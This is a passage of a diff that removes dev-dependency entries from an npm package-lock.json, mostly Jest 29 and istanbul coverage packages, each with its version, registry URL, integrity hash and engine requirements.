"sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - 